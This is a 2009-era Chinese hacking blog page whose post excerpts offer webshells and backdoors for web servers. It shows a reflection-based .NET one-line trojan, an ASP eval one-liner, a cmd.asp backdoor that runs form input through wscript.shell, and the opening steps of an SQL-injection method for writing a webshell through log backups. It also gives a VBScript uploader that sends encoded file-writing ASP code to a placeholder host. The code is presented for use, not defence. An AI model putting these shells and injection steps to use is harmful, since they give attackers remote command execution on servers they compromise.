鬼仔's Blog

Author:零魂(zerosoul)

V0.2
2009-11-11(正好是光棍节，晕~)更新内容:
—————————–
1.修补了下原始版本有些服务器不能正常运行的大Bug。
2.去掉了提交后的登陆密码验证，提交后直接进入大马界面。
阅读全文 »

作者：cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试，附赠几个插件。。。
1.扫可写目录插件
使用方法：设置扫描起始目录，设置扫描成功N个后停止，扫描。
阅读全文 »

鬼仔注：刚从外面回来，看到cnqing在gtalk上给我的留言，只扔给一个链接。

作者：cnqing

软件说明：
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »

来源：s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL– (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)– (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init– (减少备分数据的大小)
阅读全文 »

作者：云杉
信息来源：火狐技术联盟


ZV新型PHP一句话木马客户端GUI版(Include利用方式) by 执着我一生[F.S.T]
=============
说明
=============
1. 说起写这个东西，我是看了ZV大大的《一种关于一句话木马的更新思想》这篇文章后，向我等这样的菜鸟利用起来确实挺麻烦，所以就有了这个工具。工具写的垃圾，有的功能实现不了，拿不出手啊。。。
愿意用的就用吧，高手可以飘过了：）

原始的文章地址：
http://my.opera.com/zvrop/blog/show.dml/394634
阅读全文 »

来源：http://home.86hy.com/

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的，只指像cmd.asp或2005a.asp的。
第一个，来看zzzeva免fso的cmd.asp
代码如下：<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了？在注入时写有点不好写。那来改一下。
阅读全文 »

来自：情感网络联盟

with wscript
if .arguments.count<2 then .quit
ffn=replace(.arguments(1),”\”,”%5C”):ffn=replace(ffn,”:”,”%3A”):ffn=replace(ffn,”~”,”%7E”)
url= “http://www.xxxx.com/a.asp?a=with+server.createobject%28%22adodb.stream%22%29%0D%0A.type%3D1%0D%0A.open%0D%0A.write+request.binaryread%28request.totalbytes%29%0D%0A.savetofile+%22″&ffn&”%22%2C2%0D%0Aend+with%0D%0AResponse.end”
fn=.arguments(0)
阅读全文 »